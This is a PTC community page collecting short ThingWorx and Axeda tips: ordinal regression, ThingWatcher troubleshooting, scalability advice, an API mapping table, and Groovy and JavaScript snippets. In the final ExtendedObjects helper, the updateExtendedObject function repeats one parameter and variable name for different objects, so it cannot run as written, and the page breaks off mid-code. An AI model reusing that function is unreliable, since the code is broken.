cancel
Showing results for 
Search instead for 
Did you mean: 
cancel
Showing results for 
Search instead for 
Did you mean: 

ThingWorx Navigate is now Windchill Navigate Learn More

IoT & Connectivity Tips

Sort by:
First we need to Understand below terms: Quantitative Variable: A quantitative variable is naturally measured as a number for which meaningful arithmetic operations make sense. Examples: Height, age, crop yield, GPA, salary, temperature, area, air pollution index (measured in parts per million), etc. Categorical variable: Any variable that is not quantitative is categorical. Categorical variables take a value that is one of several possible categories. As naturally measured, categorical variables have no numerical meaning. Examples: Hair color, gender, field of study, college attended, political affiliation, status of disease infection. Ordinal Variables: An ordinal variable is a categorical variable for which the possible values are ordered. Ordinal variables can be considered “in between” categorical and quantitative variables. Example: Educational level might be categorized as     1: Elementary school education     2: High school graduate     3: Some college     4: College graduate     5: Graduate degree •    In this example (and for many ordinal variables), the quantitative differences between the categories are uneven, even though the differences between the labels are the same. (e.g., the difference between 1 and 2 is four years, whereas the difference between 2 and 3 could be anything from part of a year to several years) •    Thus it does not make sense to take a mean of the values. •    Common mistake: Treating ordinal variables like quantitative variables without thinking about whether this is appropriate in the particular situation at hand. Ordinal regression: In statistics, ordinal regression (also called "ordinal classification") is a type of regression analysis used for predicting an ordinal variable. The Ordinal Regression procedure allows you to build models, generate predictions, and evaluate the importance of various predictor variables in cases where the dependent (target) variable is ordinal in nature. Ordinal dependents and linear regression: When you are trying to predict ordinal responses, the usual linear regression models don't work very well. Those methods can work only by assuming that the outcome (dependent) variable is measured on an interval scale. Because this is not true for ordinal outcome variables, the simplifying assumptions on which linear regression relies are not satisfied, and thus the regression model may not accurately reflect the relationships in the data. In particular, linear regression is sensitive to the way you define categories of the target variable. With an ordinal variable, the important thing is the ordering of categories. So, if you collapse two adjacent categories into one larger category, you are making only a small change, and models built using the old and new categorizations should be very similar. Unfortunately, because linear regression is sensitive to the categorization used, a model built before merging categories could be quite different from one built after. Below are some examples pf ordered logistic regression: Example 1: A marketing research firm wants to investigate what factors influence the size of soda (small, medium, large or extra large) that people order at a fast-food chain. These factors may include what type of sandwich is ordered (burger or chicken), whether or not fries are also ordered, and age of the consumer. While the outcome variable, size of soda, is obviously ordered, the difference between the various sizes is not consistent. The difference between small and medium is 10 ounces, between medium and large 8, and between large and extra large 12. Example 2: A researcher is interested in what factors influence modaling in Olympic swimming. Relevant predictors include at training hours, diet, age, and popularity of swimming in the athlete’s home country. The researcher believes that the distance between gold and silver is larger than the distance between silver and bronze. Example 3: A study looks at factors that influence the decision of whether to apply to graduate school. College juniors are asked if they are unlikely, somewhat likely, or very likely to apply to graduate school. Hence, our outcome variable has three categories. Data on parental educational status, whether the undergraduate institution is public or private, and current GPA is also collected. The researchers have reason to believe that the “distances” between these three points are not equal. For example, the “distance” between “unlikely” and “somewhat likely” may be shorter than the distance between “somewhat likely” and “very likely”. How to use and get result by Ordinal Regression: Clink this link for PDF                                                                                                                                                                                                                                                                                                                        PDF source: http://www.norusis.com
View full tip
This blog is intended to help diagnose and fix the most common issues that may be encountered when working with ThingWatcher. It cannot be stressed strongly enough that you should be familiar with your data including the average time interval between data points, and the collection duration and certainty threshold you specified. Before you start troubleshooting ThingWatcher, check that result and training microservices is running. For testing result microservices open a web browser and paste result URL; http://<IP of microservices>:<Port of results microservices>/results/models (e.g., http://localhost:8096/results/models) For testing training microservices open a web browser and paste training URL; http://<IP of microservices>:<Port of training microservices>/training (e.g., http://localhost:8091/training) If you see either: {"values":[],"total":0,"next":null,"previous":null} or a list of training jobs in JSON format, this means the result and training microservice service is available. 1. Question. I haven't seen an anomaly but I believe that my 'property' is anomalous?         This can be caused by different reasons, here are the most common causes: The certainty is too high. If the certainty is too high ThingWatcher is conservative in its categorization of "true positives" and therefore may emit more "false negatives". Reducing the certainty will change this behavior but note that ThingWatcher may now categorize too many "false positives" as a result. In other words, ThingWatcher may detect the desired anomalies but also some non-anomalies. The 'property' is anomalous during training data collection. If ThingWatcher creates a predictive model from anomalous data, it may not be able to detect the desired anomalies during MONITORING because the data does not really appear to be anomalous. So ThingWatcher treats this pattern as 'normal'. Therefore, ensure that 'property' values are also non-anomalous during training. There are long time gaps during the monitoring state so ThingWatcher stays in Buffering and categorizes these data points as non-anomalous. 2. Question. ThingWatcher detects an anomaly but my 'property' is non-anomalous? The certainty might be too low. In this case, ThingWatcher reports anomalies when the incoming data pattern looks even slightly different from the expected data pattern. ThingWatcher might need more training data. If the 'property' data has a pattern that occurs over a long time span, ThingWatcher needs to collect multiple cycles of all these patterns in order to detect a true anomaly without emitting too many false positives. 3. Question. ThingWatcher is in FAILED State, why?     There are many possible reasons for a failed state, here are the most likely problems that can cause a failed state. ThingWatcher emits a FAILED ThingWatcher State because the training service has not been setup or is down. similarly, the result service is not available. NotemessageText=Unexpected exception. {Throwable=[ConnectException: Operation timed out}]]messageText=Unexpected exception. {Throwable=[ConnectException: Connection refused}]]. Note that ThingWatcher is still able to collect all training data and you will only begin to see these failed states after ThingWatcher tried to post the training request. ThingWatcher emits a FAILED ThingWatcher State because time gaps prevent the data collection for training.You will see this warning in the log messages : "A long time gap was detected in the data that is greater than the threshold of {n}". This means you have a long gap in the training data and ThingWatcher will recollect the data. If there are more than 3 recollections due to a long time gap, ThingWatcher transitions to a failed state and will not be able to recover. In this case you can either instruct ThingWatcher to retrain and try again or check the data source to make sure it does not have long gaps. 4. Question. Why does ThingWatcher remain in Buffering? There are many possible reasons for ThingWatcher to remain in Buffering, but the most likely issue is time gaps which cause ThingWatcher to remain stuck in Buffering. If the incoming data regularly contains long time gaps, you will notice that ThingWatcher keeps alternating between the monitoring and buffering states. You may need to provide better quality data i.e. more evenly spaced data. Source: Alex Meng, Specialist Software Engineer
View full tip
Video Author:                     Asia Garrouj Original Post Date:            November 29, 2016 Applicable Releases:        ThingWorx Analytics 52.0 to 8.1   Description: Signals indicate the predictive strength or weakness of specific features on the goal variable. Use Signals to explore which features are important to predicting outcomes, and which are not.   Please Note:  In this video, it states that a model needs to be created prior to running Signals.  As of ThingWorx Analytics 8.1, this is no longer the case.    
View full tip
Axeda Enterprise has long provided a feature to run custom code on the server side in response to end user requests or events triggered by data sent in by remote agents.  Version 6.6 introduced Axeda Artisan - an Apache Maven based tool to add modern best practices to developing Axeda-based solutions, using modern code editors such as Eclipse and IntelliJ, and allowing for the use of source code control tools like Git or Clearcase.  One downside to Artisan, however, is that it has no export tool - no way to take currently existing entities in the Axeda instance, and save them. The attached Groovy script, GetCustomObjects.groovy, solves that problem for custom objects.  It will iterate an Axeda instance and save any found CustomObjects to disk for backup, or to use to bootstrap an Artisan project from an existing instance. { / }  » groovy GetCustomObjects.groovy usage: getCustomObjects -acceptBadSSL          Ignore any TLS validation issues -h                     help -instance <instance>   instance name - directory to store results -password <password>   password -url <url>             url of Axeda Machine Cloud -username <username>   username An example call might look like: { / } groovy GetCustomObjects.groovy -instance prod-instance -url https://prod-instance.example.com -username <uname> -password <pwd> This will save all custom objects in a directory called prod-instance.
View full tip
Video Author:                     Christophe Morfin                Original Post Date:            June 14, 2017 Applicable Releases:        ThingWorx Analytics 8.0 & 8.1   Description: In this video we show: How to deploy the microservices via jar files How to setup ThingWorx to use these microservices for anomaly detection    
View full tip
5 Common Mistakes to Developing Scalable IoT Applications by Tori Firewind and the IoT EDC Team Introduction To build scalable applications, it’s necessary to identify common mistakes and avoid them at the early stages of development. In an expert session this past month, the PTC Enterprise Deployment Team elaborated on why scalability is important and how to avoid the common development pitfalls in IoT. That video presentation has been adapted here for visual consumption of the content as well.   What is Scalability and Why Does it Matter Enterprise ready applications can scale and easily be maintained, which is important even from day 1 because scalability concerns are the largest cause for delays to Go Lives.  Applications balance many competing requirements, and performance testing is crucial to ensure an application is ready for Go Live. However, don't just test how many remote assets can connect at once, but also any metrics that are expected to increase in time, like the number of remote properties per thing, the frequency of reporting from those properties, or the number of users accessing the system at once. Also consider how connecting more assets will affect the user experience and business logic, and not just the ability to ingest data.   Common Mistake 1: Edge Property Updates Because ThingWorx is always listening for updates pushed from the Edge and those resources are always in use, pulling updates from the Foundation side wastes resources. Fetch from remote every read is essentially a round trip, so it's slower and more memory intensive, but there are reasons to do it, like if the quality tag is needed since the cache doesn't store it. Say a property is pushed at 11:01, and then there's a network issue at 11:02. If the property is pulled from the cache, it will pull the value sent at 11:01 without any indication of there being a more recent value on the Edge device. Most people will use the default options here: read from server cache, which relies on the Edge to push updates, and the VALUE push type, and configuring a threshold is a good idea as well. This way, only those property updates which are truly necessary are sent to the Foundation server. Details on property aspects can be found in KCS Article 252792.   This is well documented in another PTC Community post. This approach is necessary and considered a best practice if there is event logic which depends on multiple properties at once. Sending all of the necessary properties to determine if an event should fire in one Infotable ensures there is no need to query the database each time a property update comes in from the Edge, which ensures independent business logic and reduces the load on the database to improve ingestion performance. This is a very broad topic and future articles will address it more specifically. The When Disconnected property aspect is a good way to configure what happens with Edge property values in a mass disconnect scenario. If revenue depends on uptime, consider losing any data that changes while a device is disconnected. All of the updates can be folded into a single value if the changes themselves aren't needed but an updated value is needed to populate remote properties upon reconnect. Many customers will want to keep all of their data, even when a device is offline and use data stores. In this case, consider how much data each Edge device can store (due to memory limitations on the devices themselves), and therefore how long an outage can last before data is lost anyway. Also consider if Foundation can handle massive spikes in activity when this data comes streaming in. Usually, a Connection Server isn't enough. Remember that the more data needs to be kept, the greater the potential for a thundering herd scenario.   Handling a thundering herd scenario goes beyond sizing considerations. It is absolutely crucial to randomize the delay each device will wait before attempting to reconnect. It should be considered a requirement to have the devices connect slowly and "ramp up" over time for multiple reasons. One is that too much data coming in too fast could overwhelm the ingestion queue and result in data loss. Another is that the business logic could demand so many system resources, that the Foundation server crashes again and again and cannot be recovered. Turning off the business logic it isn't possible if the downtime is unexpected, so definitely rely instead on randomized reconnection times for Edge devices.   Common Mistake 2: Overlooking Differences in HA To accommodate a shared thing model across many servers, changes had to be made in how the thing model is stored and the model tree is walked by the Foundation servers. Model information is no longer cached at the Thing level, and the model tree is therefore walked every time model information is needed, so the number of times a Thing is directly referenced within each service should be limited (see the Help Center for details).   It's best to store whatever information is needed from a Thing in an Infotable, making the Things[thingName] reference a single time, outside of any loops. Storing the property definitions outside of the loop prevents the repetitious Thing references within the service, which otherwise would have occurred twice for each property (for both the name and the description), and then again for every single property on the Thing, a runtime nightmare.   Certain states previously held in memory are now shared across the cluster, like property values, Thing states, and connection statuses. Improvements have been made to minimize the effects of latency on queries, like how they now only return property values on associated Thing Shapes or Thing Templates. Filtering for properties on implementing Things is still possible, but now there is a specific service to do it, called GetThingPropertyValues (covered in detail in the Help Center).    In the script shown above, the first step is a query to get the names of all implementing things of a particular Thing Shape. This is done outside of any loops or queries, so once per service call. Then, an Infotable is built to store what would have been a direct reference to each thing in a traditional loop. This is a very quick loop that doesn't add much by way of runtime since it is all in memory, with no references to the thing model or the database, instead using the results of the first query to build the Infotable. Finally, this thing reference Infotable is passed into the new service GetThingPropertyValues to retrieve all of the property info for all of these things at once, thereby only walking the thing model once. The easiest mistake people would make here is to do a direct thing reference inside of a loop, using code like Things[thingName].Get() over and over again, thereby traversing the thing model repeatedly and adding a lot of runtime. QueryImplementingThingsOptimized is another new service with new parameters for advanced configuration. Searches can now be done on particular networks or to particular depths, and there's an offset parameter that allows for a maximum number of items to be returned starting at any place in the list of Things, where previously if you needed the Things at the end of the list, you had to return all of the Things. All of these options are detailed in the Help Center, as well as the restrictions listed in the image above.    Common Mistake 3: Async Service Misuse   Async services are sometimes required, say if a user has to trigger many updates on many remote things at once by the click of a button on a mashup that should not be locked up waiting for service completion. Too many async service calls, though, result in spikes in activity and competition for resources. To avoid this mistake, do not use async unless strictly necessary, and avoid launching too many async threads in parallel. A thread dump will show how many threads there are and what they are doing.   Common Mistake 4: Thread Pool Overload Adding more threads to the pool may be beneficial in certain circumstances, like if the threads are waiting on other resources to complete their tasks, look stuff up in the database (I/O), or unlock data that can only be accessed one thread at a time (property writes). In this case, threads are waiting on other resources, and not the CPU, so adding more threads to the pool can improve performance. However, too many threads and performance degradation will occur due to increased contention, wasted CPU cycles, and context switches.   To check if there are too many or not enough threads in the pool, take thread dumps and time the completion of requests in the system. Also watch the subsystem memory usage, and note that the side of the queue should never approach the max. Also consider monitoring the overall performance of the system (CPU and Memory) with a tool like Grafana, and remember that a good performance test properly exercises all of the business logic and induces threads in a similar way to real world expectations.   Common Mistake 5: Stream Etiquette Upserts, or updates to database tables, are expensive operations that can interfere with ingestion if they are performed on the wrong tables. This is why Value Stream and Stream data should never be updated by end users of the application. As described in the DGIS document on best practices, aggregation is the key to unlocking optimal performance because it reduces the size of database tables that require upserts. Each data structure shown here has an optimal use in a well-designed ThingWorx application.   Data Tables are great for storing overview information on all of the Things in one view, and queries on this data source are the fastest. Update this data source as often as possible (by timer), allowing enough time for updates to be gathered and any necessary calculations made. Data Tables can also be updated by end users directly because each row locks one at a time during updates. Data Tables should be kept as small as possible to improve performance on mashups, so for instance, consider using one to show all Things per region if there are millions of Things. Roll up information is best stored here to avoid calculations upon mashup load, and while a real-time view of many thousands of things at once is practically impossible, this option allows for a frequently updates overview of many things, which can also drill down to other mashup views that are real-time for one Thing at a time.   Value Streams are best used for data ingestion, and queries to these should be kept to a minimum, largely performed by the roll up logic that populates the Data Tables mentioned above. Queries that chart all of the data coming in are best utilized on individual Thing views so that only a handful of users are querying the same data sources at a time. Also be sure to use start and end dates and make use of the "source" field to improve query performance and create a better user experience. Due to the massive size of the corresponding database tables, it's best to avoid updating Value Streams outside of the data ingestion process altogether.   Streams are similar, but better for storing aggregated, historical data. Usually once per day or per week (outside of business hours if possible), Value Stream data will be smoothed or reduced into less data points and then stored into Streams. This allows for data to be stored for longer periods of time on the server without using up as much memory or hurting query performance. Then the high volume ingested data sources can be purged frequently, as discussed below.   Infotables are the most memory intensive, and are really designed to hold only a small number of rows at a time, usually to facilitate the business logic. Sometimes they will be stored in Streams or Data Tables if they aren't expected to grow larger (see the DGIS Coffee Machine App for an example). Infotables should never be logged; if they are used to transmit Edge property updates (like in the Property Set Approach), they should be processed into other logged (usually local) properties.   Referring to the properties themselves is how to get real-time information on a mashup, say by using the GetProperties service and its auto-update option, which relies on internal websockets. This should be done on individual Thing views only, and sizing considerations need to be made if there will be many of these websockets open at once, say if there are many end users all viewing real-time data at a time.   In the newer versions of ThingWorx, these cannot be updated directly, so find the system object called ThingWorxPersistenceProvider and use the service UpdateStreamDataProcessingSettings. ThingWorx Foundation processes data received from remote devices in batches in order to manage the data flow and reduce database churn. All of these settings configure how large those batches are and how frequently they are flushed to the database (detailed in full in KCS Article 240607). This is very advanced configuration that heavily depends on use case and infrastructure, but some info applies to most people: adjusting the scan rate is usually not beneficial; a healthy queue should never approach the max limit; and defaults differ by database because they function differently. InfluxDB generally works better when there are less processing threads and higher numbers of things per thread, while PostgresDB can have a lot of threads, preferably with less things per thread. That's why the default values shown here are given as the same number of threads (and this can be changed), but Influx has a larger block size and size threshold because it can handle more items per thread. Value Streams ingest all data into the Foundation server, and so the database tables that correspond with these data sources grow very large, very quickly and need to be purged often and outside of business hours, usually once a day or once per week. That's why it's important to reduce the data down to less points and push them into Streams for historical reference. For a span of years, consider a single point a day might be enough, for a span of hours, consider a data point a minute. Push aggregated data into Streams and then purge the rest as soon as it is no longer needed.   In Conclusion
View full tip
Video Author:                    Christophe Morfin Original Post Date:            September 13, 2016 Applicable Releases:        ThingWorx Analytics 52.1 to 8.1 Description: In this video we cover the different configuration steps required for ThingWorx Analytics Builder extension.   Please Note: This video uses Classic Composer.  The same operations can be done using the New Composer starting with version 8.0 as illustrated in the Help Center For release 8.1, the Settings menu differs from previous versions, see What's New in ThingWorx Analytics Builder 8.1 between times 00:12 sec to 00:40 sec for an up to date menu selection.  
View full tip
Mapping previous versions of ThingWorx Analytics API to ThingWorx Analytics 8.1 Services Since ThingWorx Analytics 8.1, the classic server monolith has been replaced by a series of independent microservices. This new structure groups services around specific elements of functionality (data, training, results). Thus the use of the previous API commands to access ThingWorx Analytics functions has been replaced by the use of ThingWorx Services. Those Services exist within specific Microservice Things accessible in the ThingWorx Platform 8.1. The table below shows a mapping of the most common previous API commands from version 8.0 and previous versions to the version 8.1 related services. The table below does not contain an exhaustive listing either of API commands nor of Services. The API commands used below are samples which might require further information like headers and Body once used. These are used in the table below for reference purposes. Previous API Command Purpose Sample Syntax TWA 8.1 Service Analytics Thing related to Service Service description 1 Version Info GET: http://<IP Address>:8080/1.0/about/versioninfo VersionInfo This service is available in each Mircorservice Thing inheriting from Analytics Server Returns the internal version number for a specific microservice. The first two digits = ThingWorx Core version. The next three digits = version of the microservice. 2 Registering new Dataset POST: http://<IP Address>:8080/1.0/datasets/ CreateDataset Data Microservice Creates the dataset uploads the data along with its metadata and optimizes it automatically. 3 Checking Dataset Status GET: http://<IP Address>:8080/1.0/datasets/<DataSet Name> ListCreatedDatasets Data Microservice This old functionality is replaced by a Service that lists all the created Datasets 4 Creating Metadata POST: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/configuration CreateDataset Data Microservice (Check line 2 for further information) 5 Checking Dataset Configuration GET: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/configuration GetDatasetSchema Data Microservice Retrieves the metadata from a dataset. 6 Loading Dataset CSV POST: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/data CreateDataset Data Microservice (Check line 2 for further information) 7 Checking Job Status GET: http://<IP Address>:8080/1.0/status/<Job ID> GetJobStatus Available in all created Microservices inheriting from AnalyticsJob Server Retrieves the status of a specific job 8 Signals Job POST: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/signals CreateJob Signals Microservice Create a job to identify signals 9 Signal Results Job GET: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/signals/<Job ID>/results RetrieveResult Signals Microservice Retrieve a result of a Signals job 10 Profile Job POST: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/profiles CreateJob Profiling Microservice Creates a job to generate profiles. 11 Profile Result Job GET: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/profiles/<Job ID>/results RetrieveResult Profiling Micorservice Retrieve the results of a profiles job. 12 Train Model Job POST: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/prediction CreateJob Training Micorservice Create a prediction model job. 13 Train Model Result Job GET: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/prediction/<Job ID>/results RetrieveModel Training Microservice Only retrieves the PMML model. But if a holdout for validation was specified in the CreateJob, a validation job is auto-created and runs. 14 Scoring Job POST: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/predictive_scores BatchScore Prediction Microservice Submit Predictive Scoring Job 15 Scoring Job Result GET: http://<IP Address>:8080/1.0/datasets/<DataSet Name>/predictive_scores/<Job ID>/results RetrieveResult Prediction Microservice Retrieve results from prediction scoring jobs
View full tip
This is a useful trick for rolling up metrics in Thingworx across various levels of a hierarchy by using Networks, ThingShapes, and recursive service definitions. Say that you have a hierachy of Things in your model such as a Global view, a Region view, and a Store view -- this could be a Mfg Plant, a Building, an Asset, etc; whatever the core metric producing Thing is in your model -- where your Store has KPIs that you want to roll up across regions and globally. First, create a template for each of your hierarchical levels. In my case it is a GlobalTemplate, RegionalTemplate, and StoreTemplate. Add a property to your StoreTemplate that will be the KPI. Now, create a Thing for the Globe, and each of your Regions and Stores. Add them to a hierachical Network as such: Now, we need to create a ThingShape to aggregate our KPIs and apply it to the Global, Regional, and Store template. Now we will define a recursive funciton on our ThingShape called GetKPI ​and define it with the following: //define our base case, when the thing template we are on is the lowest level of our hierarchy, in this case the StoreTemplate if (me.thingTemplate == "StoreTemplate") {     //in our base case, the result is just the property for the metric we want to aggregate     result = me.someMetric } else {     //otherwise, we are at some other level in the hierarchy and we need to get our child connections from the network     //this gets all the things below us in the network     var params = {         name: me.name /* STRING */     };     // result: INFOTABLE dataShape: NetworkConnection     var network = Networks["Network"].GetChildConnections(params);     //loop through each of the things below us in the hierarchy and recursively add the result of GetKPI() to our result     result = 0;     for each (var row in network.rows) {             result += Things[row.to].GetKPI();     } } This is a simple case of just summing up a single property, but we can take this further using the Union and Aggregate snippets provided by thingworx to do other kinds of summarization. First add a new property called someAvgMetric ​to our StoreTemplate, and define a new service GetKPIProperties as such, with an InfoTable result, on the StoreTemplate varparams = {     propertyNames: {"items": ["someMetric", "someAvgMetric"]} /* JSON */ }; // result: INFOTABLE dataShape: "undefined" var result = me.GetNamedProperties(params); Now, define a new service on our ThingShape to utilize this service as our base case, and aggregate the resulting InfoTable when necessary. We'll call this service GetKPIAggregates: //define our base case if (me.thingTemplate == "StoreTemplate") {     //this function will be on the StoreTemplate, and returns the base infotable     result = me.GetKPIProperties() } else {     //grab our network     var params = {         name: me.name /* STRING */     };     // result: INFOTABLE dataShape: NetworkConnection     var network = Networks["Network"].GetChildConnections(params);     //need to create an empty infotable to union into. I glossed over this, but you'll need a datashape here     //create empty infotable     var result = Resources["InfoTableFunctions"].CreateInfoTableFromDataShape({ infoTableName: "InfoTable", dataShapeName: "KPIDataShape" });     //loop through and union each of our results to our new infotable     for each (var row in network.rows) {         var params = {             t1: result /* INFOTABLE */,             t2: Things[row.to].GetKPIAggregates() /* INFOTABLE */         };         var result = Resources["InfoTableFunctions"].Union(params);     }     //aggregate each of our fields     var params = {         t: result /* INFOTABLE */,         columns: "someMetric,someAvgMetric" /* STRING */,         aggregates: "SUM,AVERAGE" /* STRING */,         groupByColumns: undefined /* STRING */     };     // result: INFOTABLE     var result = Resources["InfoTableFunctions"].Aggregate(params);     //need to loop through each of our field names and make them match our base infotable     // infotable datashape iteration     var dataShapeFields = result.dataShape.fields;     for (var fieldName in dataShapeFields) {         var stringName = dataShapeFields[fieldName].name;         var params = {             t: result /* INFOTABLE */,             from: stringName /* STRING */,             to: stringName.split("_")[1] /* STRING */         };         // result: INFOTABLE         var result = Resources["InfoTableFunctions"].RenameField(params);     } } Now, in our mashups, we can use a DynamicThingShape and call our GetKPIs service at any level in our network, and our data will be aggregated correctly for whatever level we are at in the hierarchy!
View full tip
This is a collection of methods for working with ExtendedObjects based on the functions used in Fleetster. import com.axeda.drm.sdk.device.Device import com.axeda.platform.sdk.v1.services.ServiceFactory import com.axeda.platform.sdk.v1.services.extobject.ExtendedObjectSearchCriteria import com.axeda.platform.sdk.v1.services.extobject.PropertySearchCriteria import com.axeda.platform.sdk.v1.services.extobject.expression.PropertyExpressionFactory import com.axeda.drm.sdk.data.CurrentDataFinder import com.axeda.platform.sdk.v1.services.extobject.ExtendedObject import com.axeda.platform.sdk.v1.services.extobject.Property import java.text.DecimalFormat import com.axeda.drm.sdk.Context import com.axeda.drm.sdk.device.DeviceDataFinder import com.axeda.drm.sdk.user.User import com.axeda.platform.sdk.v1.services.extobject.ExtendedObjectService import com.axeda.platform.sdk.v1.services.extobject.PropertyType import com.axeda.platform.sdk.v1.services.extobject.PropertyDataType import com.axeda.platform.sdk.v1.services.extobject.ExtendedObjectType import com.axeda.common.sdk.id.Identifier import groovy.time.* /* ************************************* */ /* HelperFunctionsExtendedObjects.groovy * Extended Object retrieval/manipulation functions. * * A collection of methods for working with ExtendedObjects. * * author: sara streeter <sstreeter@axeda.com> ************************************* */     def eoSvc = new ServiceFactory().getExtendedObjectService()     def fetchFirstExtendedObject(DataItem dataItem, Map searchcriteria) {         def criteria = new ExtendedObjectSearchCriteria()         criteria.extendedObjectClassName = 'com.axeda.drm.sdk.device.DataItem'         criteria.internalObjectId = dataItem.id.value         criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"         def eo       if (searchcriteria != null){             criteria.propertySearchCriteria = advancedPropertySearch(searchcriteria)         }        def queryResult = eoSvc.findExtendedObjects(criteria,  -1, -1, null)         if (queryResult.size() > 0 ){         eo = queryResult.first()         }        return eo     }    def addOrFetchExtendedDataItem(DataItem dataItem, Map searchcriteria) {         def criteria = new ExtendedObjectSearchCriteria()         criteria.extendedObjectClassName = 'com.axeda.drm.sdk.device.DataItem'         criteria.internalObjectId = dataItem.id.value         criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"         def eo       if (searchcriteria != null){             criteria.propertySearchCriteria = advancedPropertySearch(searchcriteria)         }        def queryResult = eoSvc.findExtendedObjects(criteria,  -1, -1, null)        if (queryResult.size() == 0 || queryResult == null){               eo = new ExtendedObject()               eo.internalObjectId = dataItem.id.value               eo.extendedObjectType = eoSvc.findExtendedObjectTypeByClassname('com.axeda.drm.sdk.device.DataItem')               eo.externalClientKey = "ExtendedDataItem!${dataItem.name}"               eo = eoSvc.createExtendedObject(eo)             searchcriteria += [eotype: "ExtendedObject"]             createProperties(eoSvc, eo, searchcriteria)          }         else eo = queryResult.first()        return eo     }    def fetchExtendedDataItem(DataItem dataItem) {         def criteria = new ExtendedObjectSearchCriteria()         criteria.extendedObjectClassName = "com.axeda.drm.sdk.device.DataItem"         criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"         criteria.internalObjectId = dataItem.id.value        def queryResult = eoSvc.findExtendedObjects(criteria,  -1, -1, null)         return queryResult     }    def fetchExtendedObjectsAdvancedCriteria(DataItem dataItem, Map searchcriteria, String classname, String uniqueKey) {         def criteria = new ExtendedObjectSearchCriteria()         criteria.extendedObjectClassName = "com.axeda.drm.sdk.device.DataItem"         criteria.extendedClientKey = "ExtendedDataItem!${dataItem.name}"         criteria.internalObjectId = dataItem.id.value        if (searchcriteria != null){             criteria.propertySearchCriteria = advancedPropertySearch(searchcriteria)         }        def queryResult = eoSvc.findExtendedObjects(criteria,  -1, -1, null)         return queryResult     }    def fetchExtendedObject(User user, Map searchcriteria) {         def criteria = new ExtendedObjectSearchCriteria()         criteria.extendedObjectClassName = "com.axeda.drm.sdk.user.User"         criteria.extendedClientKey = "ExtendedObject!${user.username}"         criteria.internalObjectId = user.id.value         criteria.propertySearchCriteria = exactdatePropertySearch(searchcriteria)         def queryResult = eoSvc.findExtendedObjects(criteria, -1, -1, null)         return queryResult     }    def addExtendedObject(String eoTypeName, Long referenceId, String referenceName, Map objectProperties) {       def eo = new ExtendedObject()       eo.internalObjectId = referenceId       eo.extendedObjectType = eoSvc.findExtendedObjectTypeByClassname(eoTypeName)       eo.externalClientKey = referenceName       eo = eoSvc.createExtendedObject(eo)       eo = createProperties(eoSvc, eo, objectProperties)        return eo     }    def updateExtendedObject(ExtendedObject ExtendedObject, ExtendedObject ExtendedObject) {                 def ExtendedObjectprop = getProperties(ExtendedObject)                 def ExtendedObjectprop = getProperties(ExtendedObject)                 def newproperties = [:]                 if (ExtendedObjectprop.timestamp != null){                 def ExtendedObjecttype = ExtendedObjectprop.lasttype                 def ExtendedObjecttime = ExtendedObjectprop.lasttime                 if (ExtendedObjecttype == null){                     newproperties["lasttype"] = ExtendedObjectprop.type                     newproperties["lasttime"] = ExtendedObjectprop.timestamp                 }                 else {                     def oldtime = Long.valueOf(ExtendedObjecttime)                     def total = (Long.valueOf(ExtendedObjectprop.timestamp) - oldtime)/1000                     // illustrating getPropertyByName /                     def lasttype = ExtendedObject.getPropertyByName("lasttype")                     lasttype.setValue(ExtendedObjectprop.type)                     def lasttime = ExtendedObject.getPropertyByName("lasttime")                     lasttime.setValue(ExtendedObjectprop.timestamp)                     updateProperty(lasttype)                     updateProperty(lasttime)                     if (ExtendedObjectprop.containsKey(ExtendedObjecttype + "_total")==false)                         {                             newproperties[ExtendedObjecttype + "_total"] = total                         }                     else {                         def totalprop = ExtendedObject.getPropertyByName(ExtendedObjecttype + "_total")                         def lasttotal = Double.valueOf(totalprop.value)                         totalprop.setValue(String.valueOf(Double.valueOf(total) + lasttotal))                         updateProperty(totalprop)                     }                 }                 if (newproperties.size() > 0){                     ExtendedObject = createProperties(eoSvc, ExtendedObject, newproperties)                 }         }         return ExtendedObject    }     def getProperties(ExtendedObject object){         def result = object.properties.inject([:]) { target, property ->               target += [(property.propertyType.name): castPropertyValueToDefinedType(property)]             }         return result     }     def formatProperties(Map properties){         def result = properties.collect { property, value ->                [type: property, time: value]             }         return result     } def updateProperty(Property property){         eoSvc.updateProperty(property)         return property }     //default string version     def createProperties (ExtendedObjectService eoSvc, ExtendedObject object, Map properties) {         return createProperties(eoSvc, object, properties, PropertyDataType.String)     }     //WARNING: PDT may not work if it's a Date; it hasn't been tested.     def createProperties (ExtendedObjectService eoSvc, ExtendedObject object, Map properties, PropertyDataType PDT) {        // http://groovy.codehaus.org/Operators#Operators-ElvisOperator         PDT = PDT?:PropertyDataType.String         properties.each { k , v ->             def property = new com.axeda.platform.sdk.v1.services.extobject.Property()             def propertytype = object.extendedObjectType.getPropertyTypeByName(k.toString())             if (propertytype == null){                 def newPropertyType = new PropertyType()                 newPropertyType.name = k                 newPropertyType.dataType = PDT                 newPropertyType.extendedObjectType = object.extendedObjectType                 eoSvc.createPropertyType(newPropertyType)                 property.propertyType = newPropertyType             } else { property.propertyType = propertytype }             property.value = (PDT == PropertyDataType.Date && v instanceof Date?v.format("yyyy-MM-ddTHH:mm:ssZ"):v.toString())             eoSvc.createPropertyOnExtendedObject(object, property)         }         object = findExtendedObjectById(object.id)         return object     }     def findExtendedObjectById(Long id){         def criteria = new ExtendedObjectSearchCriteria()         criteria.id = id         def queryResult = eoSvc.findExtendedObjects(criteria,  -1, -1, null)         return queryResult.first() }     def findObjectByNextPropertyValue (ExtendedObject object, Map criteria, PropertySearchCriteria psCriteria){        Property prop = object.getPropertyByName(criteria.incrementName)        def incrementedProp = prop.value.toInteger() + criteria.incrementValue.toInteger()            psCriteria.setPropertyExpression(            PropertyExpressionFactory.and(                     psCriteria.propertyExpression,                     PropertyExpressionFactory.eq(criteria.incrementName, incrementedProp.toString())                    )             )        def eoCriteria = new ExtendedObjectSearchCriteria()         eoCriteria.extendedObjectClassName = "com.axeda.drm.sdk.user.User"         eoCriteria.internalObjectId = object.internalObjectId         eoCriteria.propertySearchCriteria = psCriteria        def 